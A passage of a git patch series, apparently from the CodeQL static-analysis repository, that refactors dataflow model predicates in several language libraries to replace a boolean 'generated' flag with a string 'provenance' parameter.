row.splitAt(";", 8) = k and getKind(k, kind, generated)) + row.splitAt(";", 8) = kind and + provenance = "manual" } /** Holds if `package` have CSV framework coverage. */ @@ -241,25 +237,25 @@ predicate modelCoverage(string package, int pkgs, string kind, string part, int part = "source" and n = strictcount(string subpkg, string type, boolean subtypes, string name, string signature, - string ext, string output, boolean generated | + string ext, string output, string provenance | canonicalPackageHasASubpackage(package, subpkg) and - sourceModel(subpkg, type, subtypes, name, signature, ext, output, kind, generated) + sourceModel(subpkg, type, subtypes, name, signature, ext, output, kind, provenance) ) or part = "sink" and n = strictcount(string subpkg, string type, boolean subtypes, string name, string signature, - string ext, string input, boolean generated | + string ext, string input, string provenance | canonicalPackageHasASubpackage(package, subpkg) and - sinkModel(subpkg, type, subtypes, name, signature, ext, input, kind, generated) + sinkModel(subpkg, type, subtypes, name, signature, ext, input, kind, provenance) ) or part = "summary" and n = strictcount(string subpkg, string type, boolean subtypes, string name, string signature, - string ext, string input, string output, boolean generated | + string ext, string input, string output, string provenance | canonicalPackageHasASubpackage(package, subpkg) and - summaryModel(subpkg, type, subtypes, name, signature, ext, input, output, kind, generated) + summaryModel(subpkg, type, subtypes, name, signature, ext, input, output, kind, provenance) ) ) } @@ -298,9 +294,8 @@ module CsvValidation { } private string getInvalidModelKind() { - exists(string row, string k, string kind | summaryModel(row) | - k = row.splitAt(";", 8) and - getKind(k, kind, _) and + exists(string row, string kind | summaryModel(row) | + kind = row.splitAt(";", 8) and not kind = ["taint", "value"] and result = "Invalid kind \"" + kind + "\" in summary model." ) diff --git a/go/ql/lib/semmle/go/dataflow/internal/FlowSummaryImplSpecific.qll b/go/ql/lib/semmle/go/dataflow/internal/FlowSummaryImplSpecific.qll index fd82938968a..5e3768d52f4 100644 --- a/go/ql/lib/semmle/go/dataflow/internal/FlowSummaryImplSpecific.qll +++ b/go/ql/lib/semmle/go/dataflow/internal/FlowSummaryImplSpecific.qll @@ -60,26 +60,25 @@ DataFlowType getSyntheticGlobalType(SummaryComponent::SyntheticGlobal sg) { any( /** * Holds if an external flow summary exists for `c` with input specification - * `input`, output specification `output`, kind `kind`, and a flag `generated` - * stating whether the summary is autogenerated. + * `input`, output specification `output`, kind `kind`, and provenance `provenance`. */ predicate summaryElement( - SummarizedCallableBase c, string input, string output, string kind, boolean generated + SummarizedCallableBase c, string input, string output, string kind, string provenance ) { exists( string namespace, string type, boolean subtypes, string name, string signature, string ext | - summaryModel(namespace, type, subtypes, name, signature, ext, input, output, kind, generated) and + summaryModel(namespace, type, subtypes, name, signature, ext, input, output, kind, provenance) and c.asFunction() = interpretElement(namespace, type, subtypes, name, signature, ext).asEntity() ) } /** - * Holds if a neutral model exists for `c`, which means that there is no - * flow through `c`. The flag `generated` states whether the model is autogenerated. + * Holds if a neutral model exists for `c` with provenance `provenance`, + * which means that there is no flow through `c`. * Note. Neutral models have not been implemented for Go. */ -predicate neutralElement(SummarizedCallable c, boolean generated) { none() } +predicate neutralElement(SummarizedCallable c, string provenance) { none() } /** Gets the summary component for specification component `c`, if any. */ bindingset[c] @@ -152,28 +151,26 @@ class SourceOrSinkElement extends TSourceOrSinkElement { /** * Holds if an external source specification exists for `e` with output specification - * `output`, kind `kind`, and a flag `generated` stating whether the source specification is - * autogenerated. + * `output`, kind `kind`, and provenance `provenance`. */ -predicate sourceElement(SourceOrSinkElement e, string output, string kind, boolean generated) { +predicate sourceElement(SourceOrSinkElement e, string output, string kind, string provenance) { exists( string namespace, string type, boolean subtypes, string name, string signature, string ext | - sourceModel(namespace, type, subtypes, name, signature, ext, output, kind, generated) and + sourceModel(namespace, type, subtypes, name, signature, ext, output, kind, provenance) and e = interpretElement(namespace, type, subtypes, name, signature, ext) ) } /** * Holds if an external sink specification exists for `e` with input specification - * `input`, kind `kind` and a flag `generated` stating whether the sink specification is - * autogenerated. + * `input`, kind `kind` and provenance `provenance`. */ -predicate sinkElement(SourceOrSinkElement e, string input, string kind, boolean generated) { +predicate sinkElement(SourceOrSinkElement e, string input, string kind, string provenance) { exists( string namespace, string type, boolean subtypes, string name, string signature, string ext | - sinkModel(namespace, type, subtypes, name, signature, ext, input, kind, generated) and + sinkModel(namespace, type, subtypes, name, signature, ext, input, kind, provenance) and e = interpretElement(namespace, type, subtypes, name, signature, ext) ) } From 59a9e255c758d32231af0696751daa5ce9ad58cb Mon Sep 17 00:00:00 2001 From: Michael Nebel Date: Mon, 19 Dec 2022 12:56:39 +0100 Subject: [PATCH 184/381] Python: Re-factor provenance related predicates for summarized callable. --- .../new/internal/FlowSummaryImplSpecific.qll | 23 ++++++++----------- 1 file changed, 10 insertions(+), 13 deletions(-) diff --git a/python/ql/lib/semmle/python/dataflow/new/internal/FlowSummaryImplSpecific.qll b/python/ql/lib/semmle/python/dataflow/new/internal/FlowSummaryImplSpecific.qll index c78fe0c857d..858f7c372a5 100644 --- a/python/ql/lib/semmle/python/dataflow/new/internal/FlowSummaryImplSpecific.qll +++ b/python/ql/lib/semmle/python/dataflow/new/internal/FlowSummaryImplSpecific.qll @@ -78,25 +78,24 @@ DataFlowType getSyntheticGlobalType(SummaryComponent::SyntheticGlobal sg) { any( /** * Holds if an external flow summary exists for `c` with input specification - * `input`, output specification `output`, kind `kind`, and a flag `generated` - * stating whether the summary is autogenerated. + * `input`, output specification `output`, kind `kind`, and provenance `provenance`. */ predicate summaryElement( - FlowSummary::SummarizedCallable c, string input, string output, string kind, boolean generated + FlowSummary::SummarizedCallable c, string input, string output, string kind, string provenance ) { exists(boolean preservesValue | c.propagatesFlowExt(input, output, preservesValue) and (if preservesValue = true then kind = "value" else kind = "taint") and - generated = false + provenance = "manual" ) } /** - * Holds if a neutral model exists for `c`, which means that there is no - * flow through `c`. The flag `generated` states whether the neutral model is autogenerated. + * Holds if a neutral model exists for `c` with provenance `provenance`, + * which means that there is no flow through `c`. * Note. Neutral models have not been implemented for Python. */ -predicate neutralElement(FlowSummary::SummarizedCallable c, boolean generated) { none() } +predicate neutralElement(FlowSummary::SummarizedCallable c, string provenance) { none() } /** * Gets the summary component for specification component `c`, if any. @@ -137,17 +136,15 @@ ReturnKind getReturnValueKind() { any() } private module UnusedSourceSinkInterpretation { /** * Holds if an external source specification exists for `n` with output specification - * `output`, kind `kind`, and a flag `generated` stating whether the source specification is - * autogenerated. + * `output`, kind `kind`, and provenance `provenance`. */ - predicate sourceElement(AstNode n, string output, string kind, boolean generated) { none() } + predicate sourceElement(AstNode n, string output, string kind, string provenance) { none() } /** * Holds if an external sink specification exists for `n` with input specification - * `input`, kind `kind` and a flag `generated` stating whether the sink specification is - * autogenerated. + * `input`, kind `kind` and provenance `provenance`. */ - predicate sinkElement(AstNode n, string input, string kind, boolean generated) { none() } + predicate sinkElement(AstNode n, string input, string kind, string provenance) { none() } class SourceOrSinkElement = AstNode; From c01361a1fd8b23dbda4349a9c746121e7be409de Mon Sep 17 00:00:00 2001 From: Michael Nebel Date: Mon, 19 Dec 2022 13:00:46 +0100 Subject: [PATCH 185/381] Ruby: Re-factor provenance related predicates for summarized callable. --- .../internal/FlowSummaryImplSpecific.qll | 24 ++++++++----------- 1 file changed, 10 insertions(+), 14 deletions(-) diff --git a/ruby/ql/lib/codeql/ruby/dataflow/internal/FlowSummaryImplSpecific.qll b/ruby/ql/lib/codeql/ruby/dataflow/internal/FlowSummaryImplSpecific.qll index 7e569972bb6..00e0a15ef77 100644 --- a/ruby/ql/lib/codeql/ruby/dataflow/internal/FlowSummaryImplSpecific.qll +++ b/ruby/ql/lib/codeql/ruby/dataflow/internal/FlowSummaryImplSpecific.qll @@ -49,25 +49,23 @@ DataFlowType getSyntheticGlobalType(SummaryComponent::SyntheticGlobal sg) { any( /** * Holds if an external flow summary exists for `c` with input specification - * `input`, output specification `output`, kind `kind`, and a flag `generated` - * stating whether the summary is autogenerated. + * `input`, output specification `output`, kind `kind`, and provenance `provenance`. */ predicate summaryElement( - FlowSummary::SummarizedCallable c, string input, string output, string kind, boolean generated + FlowSummary::SummarizedCallable c, string input, string output, string kind, string provenance ) { exists(boolean preservesValue | c.propagatesFlowExt(input, output, preservesValue) and (if preservesValue = true then kind = "value" else kind = "taint") and - generated = false + provenance = "manual" ) } /** - * Holds if a neutral model exists for `c`, which means that there is no - * flow through `c`. The flag `generated` states whether the neutral model is autogenerated. - * Note. Neutral models have not been implemented for ruby. + * Holds if a neutral model exists for `c` with provenance `provenance`, + * which means that there is no flow through `c`. */ -predicate neutralElement(FlowSummary::SummarizedCallable c, boolean generated) { none() } +predicate neutralElement(FlowSummary::SummarizedCallable c, string provenance) { none() } bindingset[arg] private SummaryComponent interpretElementArg(string arg) { @@ -207,17 +205,15 @@ NormalReturnKind getReturnValueKind() { any() } private module UnusedSourceSinkInterpretation { /** * Holds if an external source specification exists for `n` with output specification - * `output`, kind `kind`, and a flag `generated` stating whether the source specification is - * autogenerated. + * `output`, kind `kind`, and provenance `provenance`. */ - predicate sourceElement(AstNode n, string output, string kind, boolean generated) { none() } + predicate sourceElement(AstNode n, string output, string kind, string provenance) { none() } /** * Holds if an external sink specification exists for `n` with input specification - * `input`, kind `kind` and a flag `generated` stating whether the sink specification is - * autogenerated. + * `input`, kind `kind` and provenance `provenance`. */ - predicate sinkElement(AstNode n, string input, string kind, boolean generated) { none() } + predicate sinkElement(AstNode n, string input, string kind, string provenance) { none() } class SourceOrSinkElement = AstNode; From 80a4197604eebd68e246f26ac1d874d5e7b6f0ea Mon Sep 17 00:00:00 2001 From: Michael Nebel Date: Mon, 19 Dec 2022 13:13:56 +0100 Subject: [PATCH 186/381] Swift: Re-factor provenance related predicates for summarized callable. --- .../codeql/swift/dataflow/ExternalFlow.qll | 24 ++++++++-------- .../internal/FlowSummaryImplSpecific.qll | 28 ++++++++----------- 2 files changed, 24 insertions(+), 28 deletions(-) diff --git a/swift/ql/lib/codeql/swift/dataflow/ExternalFlow.qll b/swift/ql/lib/codeql/swift/dataflow/ExternalFlow.qll index 2c90d1e7351..89db67289f6 100644 --- a/swift/ql/lib/codeql/swift/dataflow/ExternalFlow.qll +++ b/swift/ql/lib/codeql/swift/dataflow/ExternalFlow.qll @@ -135,7 +135,7 @@ predicate summaryModel(string row) { any(SummaryModelCsv s).row(row) } /** Holds if a source model exists for the given parameters. */ predicate sourceModel( string namespace, string type, boolean subtypes, string name, string signature, string ext, - string output, string kind, boolean generated + string output, string kind, string provenance ) { exists(string row | sourceModel(row) and @@ -149,13 +149,13 @@ predicate sourceModel( row.splitAt(";", 6) = output and row.splitAt(";", 7) = kind ) and - generated = false + provenance = "manual" } /** Holds if a sink model exists for the given parameters. */ predicate sinkModel( string namespace, string type, boolean subtypes, string name, string signature, string ext, - string input, string kind, boolean generated + string input, string kind, string provenance ) { exists(string row | sinkModel(row) and @@ -169,13 +169,13 @@ predicate sinkModel( row.splitAt(";", 6) = input and row.splitAt(";", 7) = kind ) and - generated = false + provenance = "manual" } /** Holds if a summary model exists for the given parameters. */ predicate summaryModel( string namespace, string type, boolean subtypes, string name, string signature, string ext, - string input, string output, string kind, boolean generated + string input, string output, string kind, string provenance ) { exists(string row | summaryModel(row) and @@ -190,7 +190,7 @@ predicate summaryModel( row.splitAt(";", 7) = output and row.splitAt(";", 8) = kind ) and - generated = false + provenance = "manual" } private predicate relevantNamespace(string namespace) { @@ -224,25 +224,25 @@ predicate modelCoverage(string namespace, int namespaces, string kind, string pa part = "source" and n = strictcount(string subns, string type, boolean subtypes, string name, string signature, - string ext, string output, boolean generated | + string ext, string output, string provenance | canonicalNamespaceLink(namespace, subns) and - sourceModel(subns, type, subtypes, name, signature, ext, output, kind, generated) + sourceModel(subns, type, subtypes, name, signature, ext, output, kind, provenance) ) or part = "sink" and n = strictcount(string subns, string type, boolean subtypes, string name, string signature, - string ext, string input, boolean generated | + string ext, string input, string provenance | canonicalNamespaceLink(namespace, subns) and - sinkModel(subns, type, subtypes, name, signature, ext, input, kind, generated) + sinkModel(subns, type, subtypes, name, signature, ext, input, kind, provenance) ) or part = "summary" and n = strictcount(string subns, string type, boolean subtypes, string name, string signature, - string ext, string input, string output, boolean generated | + string ext, string input, string output, string provenance | canonicalNamespaceLink(namespace, subns) and - summaryModel(subns, type, subtypes, name, signature, ext, input, output, kind, generated) + summaryModel(subns, type, subtypes, name, signature, ext, input, output, kind, provenance) ) ) } diff --git a/swift/ql/lib/codeql/swift/dataflow/internal/FlowSummaryImplSpecific.qll b/swift/ql/lib/codeql/swift/dataflow/internal/FlowSummaryImplSpecific.qll index cdaded55342..5a364c3f63b 100644 --- a/swift/ql/lib/codeql/swift/dataflow/internal/FlowSummaryImplSpecific.qll +++ b/swift/ql/lib/codeql/swift/dataflow/internal/FlowSummaryImplSpecific.qll @@ -56,51 +56,47 @@ DataFlowType getSyntheticGlobalType(SummaryComponent::SyntheticGlobal sg) { any( /** * Holds if an external flow summary exists for `c` with input specification - * `input`, output specification `output`, kind `kind`, and a flag `generated` - * stating whether the summary is autogenerated. + * `input`, output specification `output`, kind `kind`, and provenance `provenance`. */ predicate summaryElement( - AbstractFunctionDecl c, string input, string output, string kind, boolean generated + AbstractFunctionDecl c, string input, string output, string kind, string provenance ) { exists( string namespace, string type, boolean subtypes, string name, string signature, string ext | - summaryModel(namespace, type, subtypes, name, signature, ext, input, output, kind, generated) and + summaryModel(namespace, type, subtypes, name, signature, ext, input, output, kind, provenance) and c = interpretElement(namespace, type, subtypes, name, signature, ext) ) } /** - * Holds if a neutral model exists for `c`, which means that there is no - * flow through `c`. The flag `generated` states whether the neutral model is autogenerated. - * Note. Neutral models have not been implemented for swift. + * Holds if a neutral model exists for `c` with provenance `provenance`, + * which means that there is no flow through `c`. */ -predicate neutralElement(AbstractFunctionDecl c, boolean generated) { none() } +predicate neutralElement(AbstractFunctionDecl c, string provenance) { none() } /** * Holds if an external source specification exists for `e` with output specification - * `output`, kind `kind`, and a flag `generated` stating whether the source specification is - * autogenerated. + * `output`, kind `kind`, and provenance `provenance`. */ -predicate sourceElement(Element e, string output, string kind, boolean generated) { +predicate sourceElement(Element e, string output, string kind, string provenance) { exists( string namespace, string type, boolean subtypes, string name, string signature, string ext | - sourceModel(namespace, type, subtypes, name, signature, ext, output, kind, generated) and + sourceModel(namespace, type, subtypes, name, signature, ext, output, kind, provenance) and e = interpretElement(namespace, type, subtypes, name, signature, ext) ) } /** * Holds if an external sink specification exists for `e` with input specification - * `input`, kind `kind` and a flag `generated` stating whether the sink specification is - * autogenerated. + * `input`, kind `kind` and provenance `provenance`. */ -predicate sinkElement(Element e, string input, string kind, boolean generated) { +predicate sinkElement(Element e, string input, string kind, string provenance) { exists( string namespace, string type, boolean subtypes, string name, string signature, string ext | - sinkModel(namespace, type, subtypes, name, signature, ext, input, kind, generated) and + sinkModel(namespace, type, subtypes, name, signature, ext, input, kind, provenance) and e = interpretElement(namespace, type, subtypes, name, signature, ext) ) } From 372ecf402fba34db9b660ae2dafaac89244b117b Mon Sep 17 00:00:00 2001 From: Michael Nebel Date: Mon, 19 Dec 2022 13:30:38 +0100 Subject: [PATCH 187/381] Go: Delete unused summaryModel predicate. --- go/ql/lib/semmle/go/dataflow/ExternalFlow.qll | 32 ++++++++----------- 1 file changed, 13 insertions(+), 19 deletions(-) diff --git a/go/ql/lib/semmle/go/dataflow/ExternalFlow.qll b/go/ql/lib/semmle/go/dataflow/ExternalFlow.qll index 2d7081c46eb..f3213e78627 100644 --- a/go/ql/lib/semmle/go/dataflow/ExternalFlow.qll +++ b/go/ql/lib/semmle/go/dataflow/ExternalFlow.qll @@ -169,25 +169,19 @@ predicate summaryModel( string namespace, string type, boolean subtypes, string name, string signature, string ext, string input, string output, string kind, string provenance ) { - summaryModel(namespace, type, subtypes, name, signature, ext, input, output, kind, provenance, _) -} - -/** Holds if a summary model `row` exists for the given parameters. */ -predicate summaryModel( - string namespace, string type, boolean subtypes, string name, string signature, string ext, - string input, string output, string kind, string provenance, string row -) { - summaryModel(row) and - row.splitAt(";", 0) = namespace and - row.splitAt(";", 1) = type and - row.splitAt(";", 2) = subtypes.toString() and - subtypes = [true, false] and - row.splitAt(";", 3) = name and - row.splitAt(";", 4) = signature and - row.splitAt(";", 5) = ext and - row.splitAt(";", 6) = input and - row.splitAt(";", 7) = output and - row.splitAt(";", 8) = kind and + exists(string row | + summaryModel(row) and + row.splitAt(";", 0) = namespace and + row.splitAt(";", 1) = type and + row.splitAt(";", 2) = subtypes.toString() and + subtypes = [true, false] and + row.splitAt(";", 3) = name and + row.splitAt(";", 4) = signature and + row.splitAt(";", 5) = ext and + row.splitAt(";", 6) = input and + row.splitAt(";", 7) = output and + row.splitAt(";", 8) = kind + ) and provenance = "manual" } From 8112058a0a9352ca30c6f1d06e2e49c087b0eeae Mon Sep 17 00:00:00 2001 From: Michael Nebel Date: Wed, 4 Jan 2023 10:35:17 +0100 Subject: [PATCH 188/381] Java: Adapt TopJdpApi library to the re-factor. --- .../semmle/code/java/dataflow/internal/FlowSummaryImpl.qll | 7 ++++++- java/ql/test/ext/TopJdkApis/TopJdkApis.qll | 4 ++-- 2 files changed, 8 insertions(+), 3 deletions(-) diff --git a/java/ql/lib/semmle/code/java/dataflow/internal/FlowSummaryImpl.qll b/java/ql/lib/semmle/code/java/dataflow/internal/FlowSummaryImpl.qll index b138fbf3417..016ee69f66b 100644 --- a/java/ql/lib/semmle/code/java/dataflow/internal/FlowSummaryImpl.qll +++ b/java/ql/lib/semmle/code/java/dataflow/internal/FlowSummaryImpl.qll @@ -261,10 +261,15 @@ module Public { NeutralCallable() { neutralElement(this, _) } /** - * Holds if the neutral is auto generated. + * Holds if the neutral is auto generated. */ predicate isAutoGenerated() { neutralElement(this, "generated") } + /** + * Holds if there exists a manual neutral that applies to `this`. + */ + final predicate isManual() { this.hasProvenance("manual") } + /** * Holds if the neutral has provenance `provenance`. */ diff --git a/java/ql/test/ext/TopJdkApis/TopJdkApis.qll b/java/ql/test/ext/TopJdkApis/TopJdkApis.qll index 76892845054..5b20b1c67c3 100644 --- a/java/ql/test/ext/TopJdkApis/TopJdkApis.qll +++ b/java/ql/test/ext/TopJdkApis/TopJdkApis.qll @@ -78,11 +78,11 @@ class TopJdkApi extends SummarizedCallableBase { } /** Holds if this API has a manual summary model. */ - private predicate hasManualSummary() { this.(SummarizedCallable).hasProvenance(false) } + private predicate hasManualSummary() { this.(SummarizedCallable).isManual() } /** Holds if this API has a manual neutral model. */ private predicate hasManualNeutral() { - this.(FlowSummaryImpl::Public::NeutralCallable).hasProvenance(false) + this.(FlowSummaryImpl::Public::NeutralCallable).isManual() } /** Holds if this API has a manual MaD model. */ From 67cbe382551151c2c6f308c348079af32b339c88 Mon Sep 17 00:00:00 2001 From: Michael Nebel Date: Wed, 4 Jan 2023 10:49:35 +0100 Subject: [PATCH 189/381] Sync files. --- .../code/csharp/dataflow/internal/FlowSummaryImpl.qll | 7 ++++++- go/ql/lib/semmle/go/dataflow/internal/FlowSummaryImpl.qll | 7 ++++++- .../python/dataflow/new/internal/FlowSummaryImpl.qll | 7 ++++++- .../lib/codeql/ruby/dataflow/internal/FlowSummaryImpl.qll | 7 ++++++- .../lib/codeql/swift/dataflow/internal/FlowSummaryImpl.qll | 7 ++++++- 5 files changed, 30 insertions(+), 5 deletions(-) diff --git a/csharp/ql/lib/semmle/code/csharp/dataflow/internal/FlowSummaryImpl.qll b/csharp/ql/lib/semmle/code/csharp/dataflow/internal/FlowSummaryImpl.qll index b138fbf3417..016ee69f66b 100644 --- a/csharp/ql/lib/semmle/code/csharp/dataflow/internal/FlowSummaryImpl.qll +++ b/csharp/ql/lib/semmle/code/csharp/dataflow/internal/FlowSummaryImpl.qll @@ -261,10 +261,15 @@ module Public { NeutralCallable() { neutralElement(this, _) } /** - * Holds if the neutral is auto generated. + * Holds if the neutral is auto generated. */ predicate isAutoGenerated() { neutralElement(this, "generated") } + /** + * Holds if there exists a manual neutral that applies to `this`. + */ + final predicate isManual() { this.hasProvenance("manual") } + /** * Holds if the neutral has provenance `provenance`. */ diff --git a/go/ql/lib/semmle/go/dataflow/internal/FlowSummaryImpl.qll b/go/ql/lib/semmle/go/dataflow/internal/FlowSummaryImpl.qll index b138fbf3417..016ee69f66b 100644 --- a/go/ql/lib/semmle/go/dataflow/internal/FlowSummaryImpl.qll +++ b/go/ql/lib/semmle/go/dataflow/internal/FlowSummaryImpl.qll @@ -261,10 +261,15 @@ module Public { NeutralCallable() { neutralElement(this, _) } /** - * Holds if the neutral is auto generated. + * Holds if the neutral is auto generated. */ predicate isAutoGenerated() { neutralElement(this, "generated") } + /** + * Holds if there exists a manual neutral that applies to `this`. + */ + final predicate isManual() { this.hasProvenance("manual") } + /** * Holds if the neutral has provenance `provenance`. */ diff --git a/python/ql/lib/semmle/python/dataflow/new/internal/FlowSummaryImpl.qll b/python/ql/lib/semmle/python/dataflow/new/internal/FlowSummaryImpl.qll index b138fbf3417..016ee69f66b 100644 --- a/python/ql/lib/semmle/python/dataflow/new/internal/FlowSummaryImpl.qll +++ b/python/ql/lib/semmle/python/dataflow/new/internal/FlowSummaryImpl.qll @@ -261,10 +261,15 @@ module Public { NeutralCallable() { neutralElement(this, _) } /** - * Holds if the neutral is auto generated. + * Holds if the neutral is auto generated. */ predicate isAutoGenerated() { neutralElement(this, "generated") } + /** + * Holds if there exists a manual neutral that applies to `this`. + */ + final predicate isManual() { this.hasProvenance("manual") } + /** * Holds if the neutral has provenance `provenance`. */ diff --git a/ruby/ql/lib/codeql/ruby/dataflow/internal/FlowSummaryImpl.qll b/ruby/ql/lib/codeql/ruby/dataflow/internal/FlowSummaryImpl.qll index b138fbf3417..016ee69f66b 100644 --- a/ruby/ql/lib/codeql/ruby/dataflow/internal/FlowSummaryImpl.qll +++ b/ruby/ql/lib/codeql/ruby/dataflow/internal/FlowSummaryImpl.qll @@ -261,10 +261,15 @@ module Public { NeutralCallable() { neutralElement(this, _) } /** - * Holds if the neutral is auto generated. + * Holds if the neutral is auto generated. */ predicate isAutoGenerated() { neutralElement(this, "generated") } + /** + * Holds if there exists a manual neutral that applies to `this`. + */ + final predicate isManual() { this.hasProvenance("manual") } + /** * Holds if the neutral has provenance `provenance`. */ diff --git a/swift/ql/lib/codeql/swift/dataflow/internal/FlowSummaryImpl.qll b/swift/ql/lib/codeql/swift/dataflow/internal/FlowSummaryImpl.qll index b138fbf3417..016ee69f66b 100644 --- a/swift/ql/lib/codeql/swift/dataflow/internal/FlowSummaryImpl.qll +++ b/swift/ql/lib/codeql/swift/dataflow/internal/FlowSummaryImpl.qll @@ -261,10 +261,15 @@ module Public { NeutralCallable() { neutralElement(this, _) } /** - * Holds if the neutral is auto generated. + * Holds if the neutral is auto generated. */ predicate isAutoGenerated() { neutralElement(this, "generated") } + /** + * Holds if there exists a manual neutral that applies to `this`. + */ + final predicate isManual() { this.hasProvenance("manual") } + /** * Holds if the neutral has provenance `provenance`. */ From 7e4f7a0c17eb09a8e4a57b82d95d66c7c4ed6c43 Mon Sep 17 00:00:00 2001 From: Michael Nebel Date: Wed, 11 Jan 2023 16:28:47 +0100 Subject: [PATCH 190/381] C#: Address review comments and sync files. --- .../semmle/code/csharp/dataflow/internal/FlowSummaryImpl.qll | 2 +- go/ql/lib/semmle/go/dataflow/internal/FlowSummaryImpl.qll | 2 +- .../lib/semmle/code/java/dataflow/internal/FlowSummaryImpl.qll | 2 +- .../lib/semmle/python/dataflow/new/internal/FlowSummaryImpl.qll | 2 +- ruby/ql/lib/codeql/ruby/dataflow/internal/FlowSummaryImpl.qll | 2 +- swift/ql/lib/codeql/swift/dataflow/internal/FlowSummaryImpl.qll | 2 +- 6 files changed, 6 insertions(+), 6 deletions(-) diff --git a/csharp/ql/lib/semmle/code/csharp/dataflow/internal/FlowSummaryImpl.qll b/csharp/ql/lib/semmle/code/csharp/dataflow/internal/FlowSummaryImpl.qll index 016ee69f66b..82db0889ace 100644 --- a/csharp/ql/lib/semmle/code/csharp/dataflow/internal/FlowSummaryImpl.qll +++ b/csharp/ql/lib/semmle/code/csharp/dataflow/internal/FlowSummaryImpl.qll @@ -241,7 +241,7 @@ module Public { } /** - * Holds if the summaries that apply to `this` are auto generated and not manually generated. + * Holds if all the summaries that apply to `this` are auto generated and not manually created. */ final predicate isAutoGenerated() { this.hasProvenance("generated") and not this.isManual() } diff --git a/go/ql/lib/semmle/go/dataflow/internal/FlowSummaryImpl.qll b/go/ql/lib/semmle/go/dataflow/internal/FlowSummaryImpl.qll index 016ee69f66b..82db0889ace 100644 --- a/go/ql/lib/semmle/go/dataflow/internal/FlowSummaryImpl.qll +++ b/go/ql/lib/semmle/go/dataflow/internal/FlowSummaryImpl.qll @@ -241,7 +241,7 @@ module Public { } /** - * Holds if the summaries that apply to `this` are auto generated and not manually generated. + * Holds if all the summaries that apply to `this` are auto generated and not manually created. */ final predicate isAutoGenerated() { this.hasProvenance("generated") and not this.isManual() } diff --git a/java/ql/lib/semmle/code/java/dataflow/internal/FlowSummaryImpl.qll b/java/ql/lib/semmle/code/java/dataflow/internal/FlowSummaryImpl.qll index 016ee69f66b..82db0889ace 100644 --- a/java/ql/lib/semmle/code/java/dataflow/internal/FlowSummaryImpl.qll +++ b/java/ql/lib/semmle/code/java/dataflow/internal/FlowSummaryImpl.qll @@ -241,7 +241,7 @@ module Public { } /** - * Holds if the summaries that apply to `this` are auto generated and not manually generated. + * Holds if all the summaries that apply to `this` are auto generated and not manually created. */ final predicate isAutoGenerated() { this.hasProvenance("generated") and not this.isManual() } diff --git a/python/ql/lib/semmle/python/dataflow/new/internal/FlowSummaryImpl.qll b/python/ql/lib/semmle/python/dataflow/new/internal/FlowSummaryImpl.qll index 016ee69f66b..82db0889ace 100644 --- a/python/ql/lib/semmle/python/dataflow/new/internal/FlowSummaryImpl.qll +++ b/python/ql/lib/semmle/python/dataflow/new/internal/FlowSummaryImpl.qll @@ -241,7 +241,7 @@ module Public { } /** - * Holds if the summaries that apply to `this` are auto generated and not manually generated. + * Holds if all the summaries that apply to `this` are auto generated and not manually created. */ final predicate isAutoGenerated() { this.hasProvenance("generated") and not this.isManual() } diff --git a/ruby/ql/lib/codeql/ruby/dataflow/internal/FlowSummaryImpl.qll b/ruby/ql/lib/codeql/ruby/dataflow/internal/FlowSummaryImpl.qll index 016ee69f66b..82db0889ace 100644 --- a/ruby/ql/lib/codeql/ruby/dataflow/internal/FlowSummaryImpl.qll +++ b/ruby/ql/lib/codeql/ruby/dataflow/internal/FlowSummaryImpl.qll @@ -241,7 +241,7 @@ module Public { } /** - * Holds if the summaries that apply to `this` are auto generated and not manually generated. + * Holds if all the summaries that apply to `this` are auto generated and not manually created. */ final predicate isAutoGenerated() { this.hasProvenance("generated") and not this.isManual() } diff --git a/swift/ql/lib/codeql/swift/dataflow/internal/FlowSummaryImpl.qll b/swift/ql/lib/codeql/swift/dataflow/internal/FlowSummaryImpl.qll index 016ee69f66b..82db0889ace 100644 --- a/swift/ql/lib/codeql/swift/dataflow/internal/FlowSummaryImpl.qll +++ b/swift/ql/lib/codeql/swift/dataflow/internal/FlowSummaryImpl.qll @@ -241,7 +241,7 @@ module Public { } /** - * Holds if the summaries that apply to `this` are auto generated and not manually generated. + * Holds if all the summaries that apply to `this` are auto generated and not manually created. */ final predicate isAutoGenerated() { this.hasProvenance("generated") and not this.isManual() } From ac064ac2a78aae7c7096a519949e30765f3c58ad Mon Sep 17 00:00:00 2001 From: Jami Cogswell Date: Wed, 11 Jan 2023 10:30:49 -0500 Subject: [PATCH 191/381] Java: remove model for Collectors.joining --- java/ql/lib/ext/java.util.stream.model.yml | 1 - java/ql/test/ext/TestModels/Test.java | 3 --- java/ql/test/ext/TopJdkApis/TopJdkApis.qll | 7 ++++--- java/ql/test/ext/TopJdkApis/TopJdkApisTest.expected | 1 + 4 files changed, 5 insertions(+), 7 deletions(-) diff --git a/java/ql/lib/ext/java.util.stream.model.yml b/java/ql/lib/ext/java.util.stream.model.yml index 7df9272f4be..190cc2709b4 100644 --- a/java/ql/lib/ext/java.util.stream.model.yml +++ b/java/ql/lib/ext/java.util.stream.model.yml @@ -9,7 +9,6 @@ extensions: - ["java.util.stream", "BaseStream", True, "sequential", "()", "", "Argument[-1].Element", "ReturnValue.Element", "value", "manual"] - ["java.util.stream", "BaseStream", True, "spliterator", "()", "", "Argument[-1].Element", "ReturnValue.Element", "value", "manual"] - ["java.util.stream", "BaseStream", True, "unordered", "()", "", "Argument[-1].Element", "ReturnValue.Element", "value", "manual"] - - ["java.util.stream", "Collectors", False, "joining", "(CharSequence)", "", "Argument[0]", "ReturnValue", "taint", "manual"] - ["java.util.stream", "Stream", True, "allMatch", "(Predicate)", "", "Argument[-1].Element", "Argument[0].Parameter[0]", "value", "manual"] - ["java.util.stream", "Stream", True, "anyMatch", "(Predicate)", "", "Argument[-1].Element", "Argument[0].Parameter[0]", "value", "manual"] - ["java.util.stream", "Stream", True, "collect", "(Supplier,BiConsumer,BiConsumer)", "", "Argument[-1].Element", "Argument[1].Parameter[1]", "value", "manual"] diff --git a/java/ql/test/ext/TestModels/Test.java b/java/ql/test/ext/TestModels/Test.java index 7be2728b190..3afd2c80897 100644 --- a/java/ql/test/ext/TestModels/Test.java +++ b/java/ql/test/ext/TestModels/Test.java @@ -129,9 +129,6 @@ public class Test { AtomicReference ar = new AtomicReference(source()); sink(ar.get()); // $hasValueFlow - // java.util.stream - sink(Collectors.joining((CharSequence)source())); // $hasTaintFlow - // java.util.concurrent CountDownLatch cdl = new CountDownLatch((int)source()); sink(cdl.getCount()); // $hasValueFlow diff --git a/java/ql/test/ext/TopJdkApis/TopJdkApis.qll b/java/ql/test/ext/TopJdkApis/TopJdkApis.qll index dca6afb4035..858659634f5 100644 --- a/java/ql/test/ext/TopJdkApis/TopJdkApis.qll +++ 